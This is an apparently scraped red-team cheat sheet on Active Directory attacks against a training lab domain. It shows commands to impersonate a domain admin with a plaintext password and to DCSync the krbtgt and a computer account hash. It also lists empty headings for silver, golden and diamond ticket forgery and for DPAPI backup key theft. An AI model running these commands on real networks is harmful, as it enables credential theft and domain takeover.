DCSync and Ticket Forgery
DCSync
# Impersonate DA
make_token INLANEFREIGHT\bjohnson Passw0rd!
# DCSync krbtgt hash
dcsync inlanefreight.local INLANEFREIGHT\krbtgt
# DCSync computer account (include $)
dcsync inlanefreight.local INLANEFREIGHT\ilf-db-1$Ticket Forgery
Silver Tickets
Golden Tickets
Diamond Tickets
DPAPI Backup Key
Extract Backup Key (Requires DA)
Decrypt Other Users' Credentials
Quick Reference - Ticket Types
Ticket Type
Secret Required
Scope
OPSEC
Last updated